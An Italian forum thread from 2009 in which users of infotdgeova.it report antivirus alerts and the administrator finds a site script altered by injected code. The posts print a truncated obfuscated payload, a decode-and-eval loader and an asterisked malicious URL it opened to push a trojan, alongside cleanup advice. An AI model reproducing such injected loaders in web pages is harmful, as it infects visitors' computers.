malware

Versione Completa   Stampa   Cerca   Utenti   Iscriviti     Condividi : FacebookTwitter
Infotdgeova -LiberaMente- » Infotdgeova -LiberaMente- » Il Forum » Problemi tecnici
hanscastorp84
00mercoledì 4 febbraio 2009 22:32
Ogni volta che accedo al sito awast mi avverte che www.infotdgeova.it/scripts/hscripts.js è infettato da malware cavallo di troia e dunque lo blocca automaticamente. E' tutto ok??



Gocciazzurra
00mercoledì 4 febbraio 2009 23:06
hanscastorp84, 04/02/2009 22.32:
Ogni volta che accedo al sito awast mi avverte che www.infotdgeova.it/scripts/hscripts.js è infettato da malware cavallo di troia e dunque lo blocca automaticamente. E' tutto ok??




Ma Avast non è un antivirus?


mauro.68
00mercoledì 4 febbraio 2009 23:24
Succede anche a me, anch'io ho avast!!!
Gocciazzurra
00mercoledì 4 febbraio 2009 23:26
Gocciazzurra, 04/02/2009 23.06:

Ma Avast non è un antivirus?



Ahh.. senza la virgola pareva che avesse citato un sito [SM=x570867]

Comunque anch'io ho Avast ma è tutto ok!


julie O'Hara
00mercoledì 4 febbraio 2009 23:43

Io ho Norton Internet Security con apposito Firewall e non mi è mai accaduto
quello che accade a hanscastorp, mai!

A me fila tutto liscio...collegamento a infotdg veloce e pulito


Bye
Julie

socrates56
00giovedì 5 febbraio 2009 05:54
Re:
mauro.68, 04.02.2009 23:24:
Succede anche a me, anch'io ho avast!!!

confermo! Socrates 56
Achille Lorenzi
00giovedì 5 febbraio 2009 06:22
Ho segnalato il problema nel forum di assistenza:

freeforumzone.leonardo.it/discussione.aspx?idd=8328742&

Mi hanno scritto anche in privato per lo stesso motivo.
Probabilmente è solo un falso allarme...

Achille
otello44
00giovedì 5 febbraio 2009 11:49
Anche a me succede la stessa cosa Avast blocca l'ingresso al sito.
Riesco ad entrare solo cliccando su "cancella" svariate volte.
per favore chi ne sa' piu' di noi utenti un po' attempati e imbranati
ci faccia sapere GRAZIE!
Otello44

[SM=x570901] [SM=x570901] [SM=x570901]
MoltoDelusa
00giovedì 5 febbraio 2009 11:56
Anche io ho avast pero' non mi ha mai creato problemi con il sito ... almeno per ora
:P filippo;)
00giovedì 5 febbraio 2009 17:05
Io non ho Avast, ho Antivir.
E anche il mio antivirus ha riscontrato il malware, da ieri esattamente.
E' ben vero che il tipo di virus segnalato nel mio caso (HEUR/HTML) è indicato su alcuni forum di informatica come un falso positivo. Tuttavia la scheda relativa a questo rilevamento sul sito di Antivir (che riporto sotto) definisce l'eventualità di un falso positivo improbabile e dice chiaro e tondo che anche i siti più fidati possono essere infestati da autori di malware.
Nella fattispecie mi da molto da pensare il fatto che le segnalazioni siano avvenute tutte nello stesso giorno e da parte di persone con antivirus diversi.
Questo è un sito che da fastidio a taluni. Non mi sorprenderebbe fosse fatto oggetto di attacchi informatici o di tentativi di scoprire l'identità di persone che lo frequentano.


HEUR/HTML.Malware is a heuristic detection routine designed to detect common malware scripts in HTML files. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.

On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with harmful or virulent file.

HEUR/HTML.Malware in particular is reported when a HTML or script file, most probabily downloaded to the system while browsing the internet, contains code with suspicious functionality. These functionalities include - but are not limited to - downloading trojans, link to other infected pages, spy the user or spoof the content of a banking site.

In the unlikely occurrence of a false positives we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir.

A heuristic detection might be a false identification if one or more of the following are true:
- The site hosting the detected file has been accessed for a very long time and is known to the user
- The detected file is from a trustworthy source

Please note that even trusted sites can be compromised to host malware scripts or have their pages hacked by malware authors.
In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis.
socrates56
00giovedì 5 febbraio 2009 17:38
Re:
:P filippo;), 05.02.2009 17:05:
Io non ho Avast, ho Antivir.
E anche il mio antivirus ha riscontrato il malware, da ieri esattamente.
E' ben vero che il tipo di virus segnalato nel mio caso (HEUR/HTML) è indicato su alcuni forum di informatica come un falso positivo. Tuttavia la scheda relativa a questo rilevamento sul sito di Antivir (che riporto sotto) definisce l'eventualità di un falso positivo improbabile e dice chiaro e tondo che anche i siti più fidati possono essere infestati da autori di malware.
Nella fattispecie mi da molto da pensare il fatto che le segnalazioni siano avvenute tutte nello stesso giorno e da parte di persone con antivirus diversi.
Questo è un sito che da fastidio a taluni. Non mi sorprenderebbe fosse fatto oggetto di attacchi informatici o di tentativi di scoprire l'identità di persone che lo frequentano.


HEUR/HTML.Malware is a heuristic detection routine designed to detect common malware scripts in HTML files. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.

On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with harmful or virulent file.

HEUR/HTML.Malware in particular is reported when a HTML or script file, most probabily downloaded to the system while browsing the internet, contains code with suspicious functionality. These functionalities include - but are not limited to - downloading trojans, link to other infected pages, spy the user or spoof the content of a banking site.

In the unlikely occurrence of a false positives we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir.

A heuristic detection might be a false identification if one or more of the following are true:
- The site hosting the detected file has been accessed for a very long time and is known to the user
- The detected file is from a trustworthy source

Please note that even trusted sites can be compromised to host malware scripts or have their pages hacked by malware authors.
In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis.


Scusa la mia scarsa conoscenza dell'inglese informatico, ma in questo caso che cosa si dovrebbe fare per evitare il problema e soprattutto per non avere problemi grav? Grazie. Socrates 56
Luteranamanier
00giovedì 5 febbraio 2009 17:51
Re:
hanscastorp84, 04/02/2009 22.32:
Ogni volta che accedo al sito awast mi avverte che www.infotdgeova.it/scripts/hscripts.js è infettato da malware cavallo di troia e dunque lo blocca automaticamente. E' tutto ok??






Succede anche a me.

[SM=x570872]


Gocciazzurra
00giovedì 5 febbraio 2009 17:54
Sino a ieri era tutto ok e invece stamane anche il mio Avast mi ha segnalato un "cavallo di troia"!

Sentiamo che dice FFZ..
Vecchia Marziana
00giovedì 5 febbraio 2009 18:03
Stamane ho anche scritto ad Achille, e poi, verso le 14 tutto è tornato normale.
Non mi segnalava virus, ma mi negava l'accesso al forum.
Gabriella Prosperi
Achille Lorenzi
00giovedì 5 febbraio 2009 18:04
Lo scritp sembra essere stato modificato.
Adesso è "pulito" e quindi non si dovrebbero più riscontrare segnalazioni strane...
Quello che non capisco è come sia possibile che uno script "innocente" (serve a verificare la validità della password di accesso alla "sezione riservata" del sito), composto solo di poche righe, possa essere stato modificato, con l'inserimento di informazioni estranee....

Questo era lo script originale

// JavaScript Document
<!-- Start script
function check(name) {
var ext = ".htm";
if ((document.pswd.pswd.value == null) || (document.pswd.pswd.value == ''))
alert('Password Errata.');
else this.location.href = document.pswd.pswd.value + name + ext;
}
// end script -->
document.write('<script language="javascript"></script>');

In quello modificato c'era molta altra roba in più... decine di righe come queste:

$="Z63eZ3dZ22p.cZ2568arZ2543odeZ2541Z2574(0Z2529Z255e(Z25270x0Z2530Z2527+es)))Z253bZ257d}Z22;cbZ3dZ2273Z2563aZ2570eZ2528Z2564s)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;Z2569Z25Z22;czZ3dZ22Z2566unZ2563tioZ256e ....

Achille
Achille Lorenzi
00giovedì 5 febbraio 2009 18:05
Vecchia Marziana, 05/02/2009 18.03:
Stamane ho anche scritto ad Achille, e poi, verso le 14 tutto è tornato normale.
Non mi segnalava virus, ma mi negava l'accesso al forum.
Gabriella Prosperi
Non c'entra. C'era qualche problema tecnico su FFZ.

Achille


MatriXRevolution
00giovedì 5 febbraio 2009 19:44
Confermo il cavallo
ho studiato un pò lo script "biricchino":

$="Z63eZ3dZ22p.cZ2568arZ2543odeZ2541Z2574(0Z2529Z255e(Z25270x0Z2530Z2527+es)))Z253bZ257d}Z22;cbZ3dZ2273Z2563aZ2570eZ2528Z2564s)Z253bstZ253dtmpZ253dZ2527Z2527;for [cut]

// Questa è la funzione che decodifica $ qui sopra...
function z(s) {
r="";
for(i=0;i if(s.charAt(i)=="Z"){
s1="%"}
else
{ s1=s.charAt(i); }
r=r+s1;
}
return unescape(r);
}

// ...e questa lancia il codice javascript contenuto nella variabile $
// dopo averlo decodificato con il semplice algoritmo di decodifica sopra questo commento ( la funzione z(s) )...

eval(z($));
document.write((z($)));



in pratica esegue il codice Javascript nella variabile $ dopo averlo decodificato con una piccola routine di decodifica (che sarebbe la funzione z(s).

poi..

Il codice javascript generato è a sua volta un'altro codice criptato con un'altra routine di decodifica e lancio...

che..

genera e lancia un'altro codice javascript che aprirà una finestra pop-up del vostro browser all'indirizzo a cui ho aggiunto degli asterischi per non farvici andare:

*******http://edu2kbdve.com/ld/grb/************

che cercherà di "iniettarvi" un "Cavallo di Troia" nel vostro PC.
socrates56
00giovedì 5 febbraio 2009 20:35
Re: Confermo il cavallo
Attualmente mi pare che il problema sia risolto ....
Non son un'esperta di informatica: Matrix potresti spiegarmi con parole semplici che cosa significa quanto hai scoperto e soprattutto se esiste il rischio reale che infetti il computer e che cosa bisogna fare (o non fare) per evitare che questo si verifichi. Grazie. Socrates 56
MatriXRevolution
00giovedì 5 febbraio 2009 20:49
Re: Re: Confermo il cavallo
socrates56, 05/02/2009 20.35:


attualmente mi pare che il problema sia risolto ....
Non son un'esperta di informatica: Matrix potresti spiegarmi con parole semplici che cosa significa quanto hai scoperto e soprattutto se esiste il rischio reale che infetti il computer e che cosa bisogna fare (o non fare) per evitare che questo si verifichi. Grazie. Socrates 56


Non è una minaccia particolarmente grave. E' una tecnica nota e stranota che serve a bypassare le protezioni dei Browser più deboli ed a ritardare la scoperta dello script da parte dello staff antivirus.

Il consiglio è quello di NON NAVIGARE con Internet Explorer ma con Mozilla Firefox oppure Opera ed avere un antivirus sempre aggiornato.

Se decidete di usare Firefox potete scaricarvi dal loro sito anche il plug-in anti-phishing PHISHTANK che bloccherà l'accesso ai siti malevoli come quello che vi ho indicato...
Gocciazzurra
00giovedì 5 febbraio 2009 21:19
MatriXRevolution, 05/02/2009 20.49:


Il consiglio è quello di NON NAVIGARE con Internet Explorer ma con Mozilla Firefox oppure Opera ed avere un antivirus sempre aggiornato.

Comunque stamattina avevo provato anche con Firefox ma i problemi c'erano lo stesso! Infatti non si apriva la pagina..


P.S.: hai fatto sforare i margini con quello script kilometricooo [SM=x570874]

P.S.2: Ho spostato il thread nella sezione opportuna.


MatriXRevolution
00giovedì 5 febbraio 2009 22:50
Re:
Gocciazzurra, 05/02/2009 21.19:

Comunque stamattina avevo provato anche con Firefox ma i problemi c'erano lo stesso! Infatti non si apriva la pagina..


P.S.: hai fatto sforare i margini con quello script kilometricooo [SM=x570874]

P.S.2: Ho spostato il thread nella sezione opportuna.




lo script serve ad aggirare il blocco dei pop-up dei browsers...
Luteranamanier
00venerdì 6 febbraio 2009 10:06
Adesso mi ha segnato di nuovo il cavallo di troia.
otello44
00venerdì 6 febbraio 2009 12:20
Oggi 06/02/09 ore 12.45 e' tornato tutto normale
non appare piu' il Malware cavallo di troia
Otello44

[SM=g1537154] [SM=g1537158] [SM=g1537154]
MatriXRevolution
00venerdì 6 febbraio 2009 12:39
Re:
Luteranamanier, 06/02/2009 10.06:
Adesso mi ha segnato di nuovo il cavallo di troia.

probabilmente devi cancellare la cache del tuo Browser oppure aggiornare le pagine...

Se usi Firefox: CTRL + SHIFT + R
Se usi Explorer: CTRL + F5 (ma non sempre funziona)
EVA70@
00venerdì 6 febbraio 2009 14:40
Ho aperto infotdgeova con firefox e avast ha bloccato un cavallo di troia..con explorer non succede..
Ma non sara' che vogliono metterci un bavaglio?
Speriamo bene!!

Eva [SM=x570865]
:P filippo;)
00mercoledì 11 febbraio 2009 09:39
Matrix,
da quando è comparso il malware in questo forum, sia sul computer al lavoro che in quello di casa (cha hanno in comune solo la frequentazione di questo forum), mi ritrovo dei messaggi strani in avvio.
Messaggi del tipo:

"0x7c921669 ha fatto riferimento alla memora 0x0000000" non poteva essere read

La cosa mi puzza ma l'informatica non è il mestiere mio.
Tu che sei un professionista che ne pensi ?
Ti ringrazio.


MatriXRevolution
00mercoledì 11 febbraio 2009 10:58
Re:
:P filippo;), 11/02/2009 9.39:
Matrix,
da quando è comparso il malware in questo forum, sia sul computer al lavoro che in quello di casa (cha hanno in comune solo la frequentazione di questo forum), mi ritrovo dei messaggi strani in avvio.
Messaggi del tipo:

"0x7c921669 ha fatto riferimento alla memora 0x0000000" non poteva essere read

La cosa mi puzza ma l'informatica non è il mestiere mio.
Tu che sei un professionista che ne pensi ?
Ti ringrazio.




che probabilmente (se usavi explorer) lo script maligno è riuscito nel suo intento di inocularti il virus.
Fatti una bella scansione con questo anti-malware:

www.chicercatrova2000.it/soft/scheda.asp?ID=240&TYPE=3

Dopo averlo installato, scarica gli aggiornamenti e poi una bella scansione...
Questa è la versione 'lo-fi' del Forum Per visualizzare la versione completa clicca qui
Tutti gli orari sono GMT+01:00. Adesso sono le 18:22.
Copyright © 2000-2024 FFZ srl - www.freeforumzone.com